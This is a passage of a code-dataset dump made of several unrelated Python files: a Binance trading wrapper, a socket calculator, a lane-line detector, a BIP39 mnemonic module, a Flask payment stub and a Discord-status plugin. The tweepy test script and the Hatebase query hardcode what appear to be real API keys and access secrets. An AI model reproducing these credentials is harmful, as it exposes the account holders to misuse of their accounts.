price:str =None, entry_percent: float = None, leverage: int = None):\n return self.market_entry(base, quote, \"market\", \"entry/sell\", amount, price, entry_percent, leverage)\n\n # def market_stop_order(self, base: str, quote: str, type: str, side: str, amount: float, price: float, stop_price: float):\n # symbol = f\"{base}/{quote}\"\n # return self.future.create_stop_market_order(symbol, type.lower(), side.lower(), amount, price, {\"stopPrice\": stop_price})\n\n def market_sltp_order(self, base: str, quote: str, type: str, side: str, amount: float, stop_price: float, profit_price: float):\n symbol = self.parse_symbol(base, quote)\n inverted_side = 'sell' if side.lower() == 'buy' else 'buy' # buy면 sell, sell이면 buy * 진입 포지션과 반대로 주문 넣어줘 야함\n self.future.create_order(symbol, \"STOP_MARKET\", inverted_side, amount, None, {\"stopPrice\": stop_price, \"newClientOrderId\": \"STOP_MARKET\"}) # STOP LOSS 오더\n self.future.create_order(symbol, \"TAKE_PROFIT_MARKET\", inverted_side, amount, None, {\"stopPrice\": profit_price, \"newClientOrderId\": \"TAKE_PROFIT_MARKET\"}) # TAKE profit 오더\n\n # response = self.future.private_post_order_oco({\n # 'symbol': self.future.market(symbol)['id'],\n # 'side': 'BUY', # SELL, BUY\n # 'quantity': self.future.amount_to_precision(symbol, amount),\n # 'price': self.future.price_to_precision(symbol, profit_price),\n # 'stopPrice': self.future.price_to_precision(symbol, stop_price),\n # # 'stopLimitPrice': self.future.price_to_precision(symbol, stop_limit_price), # If provided, stopLimitTimeInForce is required\n # # 'stopLimitTimeInForce': 'GTC', # GTC, FOK, IOC\n # # 'listClientOrderId': exchange.uuid(), # A unique Id for the entire orderList\n # # 'limitClientOrderId': exchange.uuid(), # A unique Id for the limit order\n # # 'limitIcebergQty': exchangea.amount_to_precision(symbol, limit_iceberg_quantity),\n # # 'stopClientOrderId': exchange.uuid() # A unique Id for the stop loss/stop loss limit leg\n # # 'stopIcebergQty': exchange.amount_to_precision(symbol, stop_iceberg_quantity),\n # # 'newOrderRespType': 'ACK', # ACK, RESULT, FULL\n # })\n\n async def market_entry_async(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, entry_percent: float = None, leverage: int = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n entry_amount = self.get_amount(base, quote, amount, entry_percent)\n if leverage is not None:\n self.set_leverage(leverage, symbol)\n return await self.future_async.create_order(symbol, type.lower(), side, abs(entry_amount))\n\n def market_close(self, base: str, quote: str, type: str, side: str, amount: float = None, price: str = None, close_percent: str = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n close_amount = self.get_amount(base, quote, amount, close_percent)\n try:\n return self.future.create_order(symbol, type.lower(), side, close_amount, params={\"reduceOnly\": True})\n except Exception as e:\n if \"position side does not match\" in str(e):\n if side == \"buy\":\n positionSide = \"SHORT\"\n elif side == \"sell\":\n positionSide = \"LONG\"\n return self.future.create_order(symbol, type.lower(), side, close_amount, params={'positionSide': positionSide})\n else:\n raise Exception(\"종료 실패\")\n\n \n def market_long_close(self, base: str, quote: str, amount: float = None, price: str = None, close_percent: str = None):\n return self.market_close(base, quote, \"market\", \"close/sell\", amount, price, close_percent)\n\n def market_short_close(self, base: str, quote: str, amount: float = None, price: str = None, close_percent: str = None):\n return self.market_close(base, quote, \"market\", \"close/buy\", amount, price, close_percent)\n\n async def market_close_async(self, base: str, quote: str, type: str, side: str, amount: float = None, price: str = None, close_percent: str = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n close_amount = self.get_amount(base, quote, amount, close_percent)\n return await self.future_async.create_order(symbol, type.lower(), side, close_amount, params={\"reduceOnly\": True})\n\n def set_leverage(self, leverage, symbol):\n self.future.set_leverage(leverage, symbol)\n\n def fetch_ticker(self, base: str, quote: str):\n symbol = self.parse_symbol(base, quote)\n if self.order_info.is_futures:\n return self.future.fetch_ticker(symbol)\n else:\n return self.spot.fetch_ticker(symbol)\n\n def fetch_price(self, base: str, quote: str):\n return self.fetch_ticker(base, quote)[\"last\"]\n\n def get_balance(self, base: str):\n balance = self.future.fetch_free_balance().get(base) if self.order_info.is_crypto and self.order_info.is_futures else self.spot.fetch_free_balance().get(base)\n if balance is None or balance == 0:\n raise Exception(\"거래할 수량이 없습니다\")\n return balance\n\n def get_futures_position(self, symbol):\n position = self.future.fetch_positions_risk(symbols=[symbol])\n if position:\n balance = position[0].get(\"contracts\")\n if balance is None or balance == 0:\n raise Exception(\"거래할 수량이 없습니다\")\n return balance\n else:\n raise Exception(\"거래할 수량이 없습니다\")\n\n def get_listen_key(self):\n url = 'https://fapi.binance.com/fapi/v1/listenKey'\n\n listenkey = httpx.post(url, headers={'X-MBX-APIKEY': self.future.apiKey}).json()[\"listenKey\"]\n return listenkey\n","repo_name":"jangdokang/poabot","sub_path":"exchange/binance.py","file_name":"binance.py","file_ext":"py","file_size_in_byte":12099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"10312440330","text":"from socket import *\n\nserver = socket(AF_INET, SOCK_STREAM)\nserver.bind(('',9999))\nserver.listen(5)\nprint(\"waiting .... \")\n\n# 여기다가 accept하면 에러가 안남\nclient, addr = server.accept()\nprint(\"Connect from :\", addr)\n\nwhile True:\n msg = client.recv(1024)\n if not msg :\n break\n\n message = msg.decode()\n\n msg = message.split(\" \")\n fi = int(msg[0])\n cal = msg[1]\n se = int(msg[2])\n if cal == \"+\":\n client.send(str((lambda x, y : x+y)(fi,se)).encode())\n elif cal == \"-\":\n client.send(str((lambda x, y : x-y)(fi,se)).encode())\n elif cal == \"*\":\n client.send(str((lambda x, y : x*y)(fi,se)).encode())\n elif cal == \"/\":\n client.send(str('%.1f' %(lambda x,y : x/y)(fi,se)).encode())\n\nclient.close()","repo_name":"jjimini98/Network-Programming","sub_path":"Homework_Review/hw5/hw5_server.py","file_name":"hw5_server.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26528457089","text":"#! /bin/env python\r\n#\r\n# Michael Gibson 27 April 2015\r\n\r\ndef data_to_result(header, data, data_present):\r\n \"\"\"Moves the header and data (if present) into a common object.\"\"\"\r\n\r\n result = {}\r\n result['notes'] = header['notes']\r\n result['frequency_parameters'] = header['frequency_parameters']\r\n\r\n if header['num_amplifier_channels'] > 0:\r\n result['amplifier_channels'] = header['amplifier_channels']\r\n if data_present:\r\n result['amplifier_data'] = data['amplifier_data']\r\n result['stim_data'] = data['stim_data']\r\n result['t_amplifier'] = data['t_amplifier']\r\n result['spike_triggers'] = header['spike_triggers']\r\n if header['dc_amplifier_data_saved']:\r\n result['dc_amplifier_data'] = data['dc_amplifier_data']\r\n\r\n if header['num_board_adc_channels'] > 0:\r\n result['board_adc_channels'] = header['board_adc_channels']\r\n if data_present:\r\n result['board_adc_data'] = data['board_adc_data']\r\n result['t_board_adc'] = data['t_board_adc']\r\n\r\n if header['num_board_dac_channels'] > 0:\r\n result['board_dac_channels'] = header['board_dac_channels']\r\n if data_present:\r\n result['board_adc_data'] = data['board_adc_data']\r\n result['t_board_dac'] = data['t_board_dac']\r\n\r\n if header['num_board_dig_in_channels'] > 0:\r\n result['board_dig_in_channels'] = header['board_dig_in_channels']\r\n if data_present:\r\n result['board_dig_in_data'] = data['board_dig_in_data']\r\n result['t_dig'] = data['t_dig']\r\n\r\n if header['num_board_dig_out_channels'] > 0:\r\n result['board_dig_out_channels'] = header['board_dig_out_channels']\r\n if data_present:\r\n result['board_dig_out_data'] = data['board_dig_out_data']\r\n result['t_dig'] = data['t_dig']\r\n\r\n return result\r\n","repo_name":"zekearneodo/swissknife","sub_path":"swissknife/bci/core/intan_rhs/util/data_to_result.py","file_name":"data_to_result.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"71101936311","text":"#Jules Henry, Ahmir Ghorbanian\n#Spring 2020\n\n#Script to test functions of other scripts\n\n#NOT TO BE USED WITH ANY OTHER FILE FROM PROJECT\n\nimport filter_by_handle\nimport tweepy\n\nCONSUMER_KEY = 'LMxsDbA4lx7RqWhf2DqGeM1yx'\nCONSUMER_SECRET = 'azc96uPycF05zlIslDudv6YaWM40OIWhOd22VBBFVsUVjtdwdp'\nACCESS_KEY = '228978699-mFQ0w0U3rEvohSQnuADEOfgu3rqQSIIVEeMMQrbU'\nACCESS_SECRET = 'cikbqBaSgseWCHIJm3NRXx3WRDgO9zRLkEiSoQest0T7i'\n\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(auth, wait_on_rate_limit = True)\n\n\nnamelist = filter_by_handle.get_info_minute()\n\nprint(len(namelist).__str__() + \" accounts\")\n\nfor x in namelist:\n try:\n user = api.get_user(x)\n screen_name = user.screen_name\n verified = user.verified.__str__()\n protect = user.protected.__str__()\n num_tweets = user.statuses_count.__str__()\n bio = user.description.__str__()\n link = user.url.__str__()\n following = user.friends_count.__str__()\n followers = user.followers_count.__str__()\n id = user.id.__str__()\n favorites = user.favourites_count.__str__()\n print(\"screen name: @\" + screen_name)\n print(\"verified: \" + verified)\n #print(\"private: \" + protect)\n print(\"number of tweets: \" + num_tweets)\n #print(\"link in bio: \" + bio)\n print(\"following: \" + following)\n print(\"followers: \" + followers)\n print(\"favorites: \" + favorites)\n print(\" \")\n print(\"-----------\")\n print(\" \")\n\n except:\n print(\"user couldnt be fetched\")\n print(\" \")\n print(\"-----------\")\n print(\" \")\n\n\n\n\n\n","repo_name":"jululules/4823","sub_path":"newsfilter/cred_validity.py","file_name":"cred_validity.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19777910109","text":"from rest_framework import serializers\n\nfrom ..messages import (\n INVALID_TIME_MESSAGE,\n no_class_found,\n timetable_clash_message,\n)\nfrom ..models import Classes, TimeTable\nfrom .classes_serializer import ListAllClassesSerializer\n\n\nclass TimeTableSerializer(serializers.ModelSerializer):\n _class_ = serializers.UUIDField()\n\n class Meta:\n model = TimeTable\n exclude = [\"_class\"]\n\n def validate(self, data):\n days = data.get(\"days\")\n start_time = data.get(\"start_time\")\n end_time = data.get(\"end_time\")\n room_no = data.get(\"room_no\")\n _class = data.get(\"_class_\")\n is_class_exists = Classes.objects.filter(id=_class).exists()\n\n if not is_class_exists:\n raise serializers.ValidationError(no_class_found(_class))\n\n if start_time > end_time:\n raise serializers.ValidationError(INVALID_TIME_MESSAGE)\n\n if TimeTable.objects.filter(\n start_time__lt=end_time,\n end_time__gt=start_time,\n room_no=room_no,\n days=days,\n ).exists():\n\n raise serializers.ValidationError(timetable_clash_message(room_no))\n\n timetable: TimeTable = TimeTable.objects.create(\n days=days,\n start_time=start_time,\n end_time=end_time,\n room_no=room_no,\n _class=Classes.objects.get(id=_class),\n )\n\n timetable.save()\n\n return data\n\n\nclass PureTimeTableSerializer(serializers.ModelSerializer):\n _class = ListAllClassesSerializer(read_only=True)\n\n class Meta:\n model = TimeTable\n exclude = [\"id\"]\n","repo_name":"AhzamAhmed6/online_school","sub_path":"src/classes/serializer/timetable_serializer.py","file_name":"timetable_serializer.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42737140730","text":"import json\nimport requests\nfrom hatebase import HatebaseAPI\n\n\nkey = \"TuwmngrrxcytZkgqyfvtpdUb4yjsKsru\"\n\nhatebase = HatebaseAPI({\"key\": key})\nfilters = {'is_about_nationality': \"false\", 'is_about_ethnicity':\"false\",'is_about_religion':\"false\",'is_about_gender':\"false\",'is_about_sexual_orientation':\"false\",'is_about_disability':\"false\",'is_about_class':\"true\", 'language': 'ENG', 'country': 'US', 'year': \"2015\"}\nformat = \"json\"\njson_response = hatebase.getSightings(filters=filters, format=format)\n\nwith open('classOnly2015.txt', 'w+') as outfile:\n \toutfile.write(json.dumps(json_response, indent=4))\n","repo_name":"chingyuany/Twitter-hatespeech-detection","sub_path":"HateBaseAPICode/hateBaseAPI.py","file_name":"hateBaseAPI.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"40859222268","text":"#You are given a string and your task is to swap cases.\n# In other words, convert all lowercase letters to uppercase letters and vice versa.\n#For Example:\n#Www.HackerRank.com → wWW.hACKERrANK.COM\n#Pythonist 2 → pYTHONIST 2\n\n\ns = input()\nnew_string = \"\"\nfor i in range(len(s)):\n if s[i].isupper():\n new_string += s[i].lower()\n else:\n new_string += s[i].upper()\nprint(new_string)","repo_name":"Rashid786-nadaf/100-days-of-code","sub_path":"swap case.py","file_name":"swap case.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"72531862388","text":"# 10-8. Cats and Dogs: Make two files, cats.txt and dogs.txt. Store at\n# least three names of cats in the first file and three names of dogs\n# in the second file. Write a program that tries to read these files\n# and print the contents of the file to the screen. Wrap your code in\n# a try-except block to catch the FileNotFound error, and print a\n# friendly message if a file is missing. Move one of the files to a\n# different location on your system, and make sure the code in the\n# except block executes properly.\n\nprint(\"\\nEx 10.8 Cats and Dogs\\n\" + \"-\"*70)\n\ndef read_txt(filename):\n try:\n with open(filename, encoding='utf-8') as file_object:\n lines = file_object.readlines()\n except FileNotFoundError:\n print(f\"\\n{filename} does not exist.\")\n else:\n print(f\"\\n{filename}:\")\n for line in lines:\n print(f\"- {line.title().rstrip()}\")\n\nfilenames = ['cats.txt', 'dogs.txt', 'cat.txt', 'dog.txt']\nfor filename in filenames:\n read_txt(filename)","repo_name":"TrongPhamDA/Python-Crash-Course-2nd-edition","sub_path":"chapter_10/tryityourself108.py","file_name":"tryityourself108.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"7555688028","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2 as cv\nimport math\n\nline_collection = []\n\n\n#take the original frame and convert it to greyscale\ndef apply_greyscale(image):\n return cv.cvtColor(image, cv.COLOR_RGB2GRAY)\n\n#apply a Gaussian Blur to the greyed image\ndef add_blur(grey):\n kernel_size = 5\n return cv.GaussianBlur(grey,(kernel_size, kernel_size), 0)\n\n#Implemented the canny algorithim on the Blurred photo\ndef apply_canny(grey):\n blur_grey = add_blur(grey)\n\n #declare the low and high thresholds. The Canny algorithim will identify edges where the gradient is near the midpoint of those\n # two values\n low_threshold = 60\n high_threshold = 100\n return cv.Canny(blur_grey, low_threshold, high_threshold)\n\n#add a mask to try to eliminate the amount of edges that are displayed in the final photo\ndef add_mask(image, edges):\n mask = np.zeros_like(edges)\n ignore_mask_color = 255\n\n imshape = image.shape\n\n\n vertices = np.array([[(0, imshape[0]),(450, 290), (490, 290), (imshape[1],imshape[0])]], dtype=np.int32)\n cv.fillPoly(mask, vertices, ignore_mask_color)\n return cv.bitwise_and(edges, mask)\n\n#check if a point is within the valid area (within the region of interest)\ndef valid_point(x, y, left, right, top, bottom):\n if(x >= left and x <= right):\n if(y >= bottom and y <= top):\n return True\n return False\n\n#compare the lines on the edge of the region of interest to the lane lines (or any edges found)\ndef compare_lines(x1, y1, x2, y2, start, end, is_left):\n compared_slope = ((end[1] - start[1])/(end[0]- start[0]))\n drawn_slope = ((y2-y1)/(x2-x1))\n\n #left side\n if(is_left):\n #compare to the left side of the region of interest\n if(valid_point(x1, y1, start[0], end[0], end[1], start[1]) and valid_point(x2, y2, start[0], end[0], end[1], start[1]) ):\n #return whether the slope of the edge is less than the slope of the left edge of the region of interest\n return (compared_slope > drawn_slope)\n elif(not is_left):\n #not left side so flip the slope\n compared_slope = -compared_slope\n drawn_slope = -drawn_slope\n if(valid_point(x1, y1, end[0], start[0], start[1], end[1]) and valid_point(x2, y2, end[0], start[0], start[1], end[1])):\n return (compared_slope > drawn_slope)\n\n return (compared_slope > drawn_slope)\n\n#draw the lines on the image\ndef drawLines(image):\n #create a greyscaled image\n grey = apply_greyscale(image)\n #apply the canny algorithim to the grey photo\n edges = apply_canny(grey)\n\n # add the mask to the image\n mask = add_mask(image, edges)\n\n #declare the parameters for the HoughLines function\n rho = 1\n theta = np.pi/180\n threshold = 1\n min_line_length = 10\n max_line_gap = 1\n line_image = np.copy(image)*0\n\n lines = cv.HoughLinesP(mask, rho, theta, threshold, np.array([]), min_line_length, max_line_gap)\n\n #define the edges of the rgion of interest\n left_bottom = (135, 539)\n right_bottom = (940,539)\n apex = (489, 300)\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n #to the left of the apex (compute the values accordingly)\n if(x1 < apex[0] and x2 <= apex[0]):\n if(compare_lines(x1, y1, x2, y2, left_bottom, apex, True)):\n #valid points draw the line\n line_collection.append([x1, y1, x2, y2, (y2-y1/x2-x1), math.sqrt((x2-x1)**2 + (y2-y1)**2)])\n cv.line(line_image,(x1,y1),(x2,y2),(255,0,0),10)\n elif(x1 > apex[0] and x2 >= apex[0]):\n if(compare_lines(x1, y1, x2, y2, right_bottom, apex, False)):\n line_collection.append([x1, y1, x2, y2, (y2-y1/x2-x1), math.sqrt((x2-x1)**2 + (y2-y1)**2)])\n cv.line(line_image,(x1,y1),(x2,y2),(255,0,0),10)\n\n color_edges = np.dstack((edges, edges, edges))\n\n for drawn in line_collection:\n print(drawn, \"\\n\")\n\n #return the completed images\n return cv.addWeighted(image, 0.8, line_image, 1, 0)","repo_name":"GiffinOsborne/OpenCV_Lane_Lines_V1","sub_path":"Finding_Lane_Lines_OOP_Version_1/houghLines.py","file_name":"houghLines.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41231749559","text":"import binascii\nimport bisect\nimport hashlib\nimport hmac\nimport itertools\nimport os\nimport sys\nimport unicodedata\n#from pbkdf2 import PBKDF2\n\nPBKDF2_ROUNDS = 2048\n\n\nclass ConfigurationError(Exception):\n pass\n\n\n# From \ndef binary_search(a, x, lo=0, hi=None): # can't use a to specify default for hi\n hi = hi if hi is not None else len(a) # hi defaults to len(a)\n pos = bisect.bisect_left(a, x, lo, hi) # find insertion position\n return (pos if pos != hi and a[pos] == x else -1) # don't walk off the end\n\n\nclass Mnemonic(object):\n def __init__(self, language):\n self.radix = 2048\n with open('%s/%s.txt' % (self._get_directory(), language), 'r') as f:\n self.wordlist = [w.strip().decode('utf8') if sys.version < '3' else w.strip() for w in f.readlines()]\n if len(self.wordlist) != self.radix:\n raise ConfigurationError('Wordlist should contain %d words, but it contains %d words.' % (self.radix, len(self.wordlist)))\n\n @classmethod\n def _get_directory(cls):\n return os.path.join(os.path.dirname(__file__), 'wordlist')\n\n @classmethod\n def list_languages(cls):\n return [f.split('.')[0] for f in os.listdir(cls._get_directory()) if f.endswith('.txt')]\n\n @classmethod\n def normalize_string(cls, txt):\n if isinstance(txt, str if sys.version < '3' else bytes):\n utxt = txt.decode('utf8')\n elif isinstance(txt, unicode if sys.version < '3' else str): # noqa: F821\n utxt = txt\n else:\n raise TypeError(\"String value expected\")\n\n return unicodedata.normalize('NFKD', utxt)\n\n @classmethod\n def detect_language(cls, code):\n code = cls.normalize_string(code)\n first = code.split(' ')[0]\n languages = cls.list_languages()\n\n for lang in languages:\n mnemo = cls(lang)\n if first in mnemo.wordlist:\n return lang\n\n raise ConfigurationError(\"Language not detected\")\n\n def generate(self, strength=128):\n if strength not in [128, 160, 192, 224, 256]:\n raise ValueError('Strength should be one of the following [128, 160, 192, 224, 256], but it is not (%d).' % strength)\n return self.to_mnemonic(os.urandom(strength // 8))\n\n # Adapted from \n def to_entropy(self, words):\n if not isinstance(words, list):\n words = words.split(' ')\n if len(words) not in [12, 15, 18, 21, 24]:\n raise ValueError('Number of words must be one of the following: [12, 15, 18, 21, 24], but it is not (%d).' % len(words))\n # Look up all the words in the list and construct the\n # concatenation of the original entropy and the checksum.\n concatLenBits = len(words) * 11\n concatBits = [False] * concatLenBits\n wordindex = 0\n if self.detect_language(' '.join(words)) == 'english':\n use_binary_search = True\n else:\n use_binary_search = False\n for word in words:\n # Find the words index in the wordlist\n ndx = binary_search(self.wordlist, word) if use_binary_search else self.wordlist.index(word)\n if ndx < 0:\n raise LookupError('Unable to find \"%s\" in word list.' % word)\n # Set the next 11 bits to the value of the index.\n for ii in range(11):\n concatBits[(wordindex * 11) + ii] = (ndx & (1 << (10 - ii))) != 0\n wordindex += 1\n checksumLengthBits = concatLenBits // 33\n entropyLengthBits = concatLenBits - checksumLengthBits\n # Extract original entropy as bytes.\n entropy = bytearray(entropyLengthBits // 8)\n for ii in range(len(entropy)):\n for jj in range(8):\n if concatBits[(ii * 8) + jj]:\n entropy[ii] |= 1 << (7 - jj)\n # Take the digest of the entropy.\n hashBytes = hashlib.sha256(entropy).digest()\n if sys.version < '3':\n hashBits = list(itertools.chain.from_iterable(([ord(c) & (1 << (7 - i)) != 0 for i in range(8)] for c in hashBytes)))\n else:\n hashBits = list(itertools.chain.from_iterable(([c & (1 << (7 - i)) != 0 for i in range(8)] for c in hashBytes)))\n # Check all the checksum bits.\n for i in range(checksumLengthBits):\n if concatBits[entropyLengthBits + i] != hashBits[i]:\n raise ValueError('Failed checksum.')\n return entropy\n\n def to_mnemonic(self, data):\n if len(data) not in [16, 20, 24, 28, 32]:\n raise ValueError('Data length should be one of the following: [16, 20, 24, 28, 32], but it is not (%d).' % len(data))\n h = hashlib.sha256(data).hexdigest()\n b = bin(int(binascii.hexlify(data), 16))[2:].zfill(len(data) * 8) + \\\n bin(int(h, 16))[2:].zfill(256)[:len(data) * 8 // 32]\n result = []\n for i in range(len(b) // 11):\n idx = int(b[i * 11:(i + 1) * 11], 2)\n result.append(self.wordlist[idx])\n if self.detect_language(' '.join(result)) == 'japanese': # Japanese must be joined by ideographic space.\n result_phrase = u'\\u3000'.join(result)\n else:\n result_phrase = ' '.join(result)\n return result_phrase\n\n def check(self, mnemonic):\n mnemonic = self.normalize_string(mnemonic).split(' ')\n # list of valid mnemonic lengths\n if len(mnemonic) not in [12, 15, 18, 21, 24]:\n return False\n try:\n idx = map(lambda x: bin(self.wordlist.index(x))[2:].zfill(11), mnemonic)\n b = ''.join(idx)\n except ValueError:\n return False\n l = len(b) # noqa: E741\n d = b[:l // 33 * 32]\n h = b[-l // 33:]\n nd = binascii.unhexlify(hex(int(d, 2))[2:].rstrip('L').zfill(l // 33 * 8))\n nh = bin(int(hashlib.sha256(nd).hexdigest(), 16))[2:].zfill(256)[:l // 33]\n return h == nh\n\n def expand_word(self, prefix):\n if prefix in self.wordlist:\n return prefix\n else:\n matches = [word for word in self.wordlist if word.startswith(prefix)]\n if len(matches) == 1: # matched exactly one word in the wordlist\n return matches[0]\n else:\n # exact match not found.\n # this is not a validation routine, just return the input\n return prefix\n\n def expand(self, mnemonic):\n return ' '.join(map(self.expand_word, mnemonic.split(' ')))\n\n #@classmethod\n #def to_seed(cls, mnemonic, passphrase=''):\n #mnemonic = cls.normalize_string(mnemonic)\n #passphrase = cls.normalize_string(passphrase)\n #return PBKDF2(mnemonic, u'mnemonic' + passphrase, iterations=PBKDF2_ROUNDS, macmodule=hmac, digestmodule=hashlib.sha512).read(64)\n\n\ndef main():\n import binascii\n import sys\n if len(sys.argv) > 1:\n data = sys.argv[1]\n else:\n data = sys.stdin.readline().strip()\n data = binascii.unhexlify(data)\n m = Mnemonic('english')\n print(m.to_mnemonic(data))\n\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"snopf/snopf","sub_path":"src/host/pc/bip39_mnemonic_reference_trezor.py","file_name":"bip39_mnemonic_reference_trezor.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"94"} +{"seq_id":"70746831671","text":"import os\r\n\r\nfrom flask import Flask, make_response, jsonify, request\r\nfrom flask import g\r\nfrom dal.db import Db\r\nfrom transaction.process_transaction import Process_Transaction\r\nfrom exception.app_exception import AppException, ClientException, ServerException\r\n\r\nimport config\r\n\r\nprocess_transaction = Process_Transaction()\r\napp = Flask(__name__)\r\napp.config.from_object(config.Config)\r\n\r\n\r\n@app.errorhandler(AppException)\r\ndef app_error(err):\r\n app.logger.exception(err)\r\n return make_response(jsonify(err.error), err.http_code)\r\n\r\n@app.errorhandler(Exception)\r\ndef handle_generic_error(err):\r\n app.logger.exception(err)\r\n return make_response(jsonify(str(err)), 500)\r\n\r\n@app.route('/process_payment', methods=['POST'])\r\ndef process_payment():\r\n data = request.get_json()\r\n result, code = process_transaction.initialize_payment(data)\r\n return make_response(jsonify(result),code)\r\n\r\ndef init_app(flask_app):\r\n flask_app.config.from_object(config.DEVConfig)\r\n db_instance = Db(flask_app)\r\n print('DB Connection: ' + str(db_instance))\r\n\r\n\r\nif __name__ == '__main__':\r\n init_app(app)\r\n app.run(host='127.0.0.1', port='5000')\r\n","repo_name":"harshilpatel99/Filed_PythonCodingTest","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"2794638063","text":"from typing import List\nfrom collections import Counter\n\n\nclass Solution:\n def countNegatives(self, grid: List[List[int]]) -> int:\n count = 0\n for i in grid:\n c = Counter(i)\n for j, k in c.items():\n if j < 0:\n count += k\n\n return count\n","repo_name":"rich-03/LeetPractice","sub_path":"Problem1351/Problem1351.py","file_name":"Problem1351.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5556297055","text":"import time\r\nimport os\r\nimport json\r\nimport gi\r\ngi.require_version('Notify', '0.7')\r\nfrom gi.repository import Notify, GObject, Peas, RB\r\nfrom pypresence import Presence\r\nfrom status_prefs import discord_status_prefs\r\n\r\nDEFAULT_APPID = \"589905203533185064\"\r\n\r\nclass DiscordStatus(GObject.Object, Peas.Activatable):\r\n object = GObject.property(type=GObject.Object)\r\n\r\n def __init__(self):\r\n super(DiscordStatus, self).__init__()\r\n\r\n print(f\"discord_status: GOBJECT SELF OBJECT: {self.object}\")\r\n\r\n settings_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"settings.json\")\r\n \r\n with open(settings_path) as settings_file:\r\n self.settings = json.load(settings_file)\r\n \r\n self.notify_available = False\r\n self.connected = False\r\n self.streaming = False\r\n self.stream_flag = False\r\n self.playing = False\r\n self.song_started_at = 0\r\n self.playing_date = 0\r\n self.elapsed_time = 0\r\n\r\n def send_notification(self, message):\r\n if self.notify_available and self.settings[\"show_notifs\"]:\r\n Notify.Notification.new(\"Rhythmbox Discord Status Plugin\", message).show()\r\n\r\n \r\n def do_activate(self):\r\n self.notify_available = Notify.init(\"rhythmbox_discord_status\")\r\n\r\n try:\r\n self.rpc = Presence(self.settings[\"appid\"] if \"appid\" in self.settings else DEFAULT_APPID)\r\n self.rpc.connect()\r\n self.connected = True\r\n self.send_notification(\"Connected to Discord\")\r\n except ConnectionRefusedError as err:\r\n print(\"discord_status: failed to connect to discord:\", err)\r\n self.send_notification(f\"Failed to connect to discord: {err}\\nRe-enable the plugin to retry\")\r\n return\r\n\r\n sp = self.object.props.shell_player\r\n self.playing_song_changed_id = sp.connect('playing-song-changed', self.on_playing_song_changed)\r\n self.playing_state_changed_id = sp.connect('playing-changed', self.on_playing_state_changed)\r\n self.elapsed_changed_id = sp.connect('elapsed-changed', self.on_elapsed_changed)\r\n self.playing_changed_id = sp.connect('playing-song-property-changed', self.on_playing_song_property_changed)\r\n \r\n self.rpc.update(state=\"Playback Stopped\", details=\"Rhythmbox Status Plugin\", large_image=\"rhythmbox\", small_image=\"stop\", small_text=\"Stopped\")\r\n\r\n def do_deactivate(self):\r\n sp = self.object.props.shell_player\r\n sp.disconnect(self.playing_song_changed_id)\r\n sp.disconnect(self.playing_state_changed_id)\r\n sp.disconnect(self.elapsed_changed_id)\r\n sp.disconnect(self.playing_changed_id)\r\n\r\n if self.connected:\r\n self.rpc.close()\r\n\r\n if self.notify_available:\r\n Notify.uninit()\r\n\r\n def get_current_song_info(self, sp):\r\n playing_entry = sp.get_playing_entry()\r\n if not playing_entry:\r\n return {\r\n \"album\": \"Unknown\",\r\n \"title\": \"Unknown\",\r\n \"artist\": \"Unknown\",\r\n \"duration\": 0\r\n }\r\n\r\n album = playing_entry.get_string(RB.RhythmDBPropType.ALBUM)\r\n title = playing_entry.get_string(RB.RhythmDBPropType.TITLE)\r\n artist = playing_entry.get_string(RB.RhythmDBPropType.ARTIST)\r\n duration = playing_entry.get_ulong(RB.RhythmDBPropType.DURATION)\r\n\r\n # If there is anything with less than 2 characters, Discord won't show our presence\r\n # So, lets add a cool empty unicode character to the end\r\n if album and len(album) < 2:\r\n album = f\"{album}​\"\r\n if title and len(title) < 2:\r\n title = f\"{title}​\"\r\n if artist and len(artist) < 2:\r\n artist = f\"{artist}​\"\r\n\r\n print(f\"discord_status: album={album} artist={artist} title={title} len_al={len(album)} len_art={len(artist)} len_title={len(title)}\")\r\n return {\r\n \"album\": album or \"Unknown\",\r\n \"title\": title or \"Unknown\",\r\n \"artist\": artist or \"Unknown\",\r\n \"duration\": duration or 0\r\n }\r\n\r\n def update_rpc(self, sp, playing):\r\n if not playing and not sp.get_playing_entry():\r\n self.playing = False\r\n\r\n self.rpc.update(\r\n 